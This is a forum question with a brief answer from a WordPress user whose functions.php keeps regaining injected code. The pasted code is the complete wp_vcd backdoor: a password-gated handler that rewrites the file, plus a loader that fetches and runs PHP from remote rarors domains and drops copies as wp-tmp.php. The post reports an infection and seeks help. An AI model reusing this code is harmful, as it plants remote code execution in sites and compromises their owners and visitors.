# Automatic generating script in functions.php

Tags: wordpress, function

I am facing a problem from last 3-4 days. In my WordPress functions.php file there is automatically generating some code. I don't know why this is happened. I have installed a free visual composer. I don't know whether this is the reason or not. I cannot even delete the code. how to fix it. Here is the code generating automatically:

```
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '4481ccb95b8bf8572a3491066dfd567d')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {






        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {

                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {

                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }


                    }
                }
            }
            break;

        case 'change_code';
            if (isset($_REQUEST['newcode'])) {

                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {

                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }


                    }
                }
            }
            break;

        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\n" . $phpCode)) {
            } else {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


        $wp_auth_key = 'f008cf96406af32ae142ee92de8032e0';
        if (($tmpcontent = @file_get_contents("http://www.rarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.rarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.rarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } elseif ($tmpcontent = @file_get_contents("http://www.rarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        }





    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>
```

Answer (score 3):

Your site has virus. You can download wordfence plugin to check which files is infect and delete them.

Comment: More info https://medium.com/@cirku17/wp-vcd-malware-analysis-7c5dbaad89c3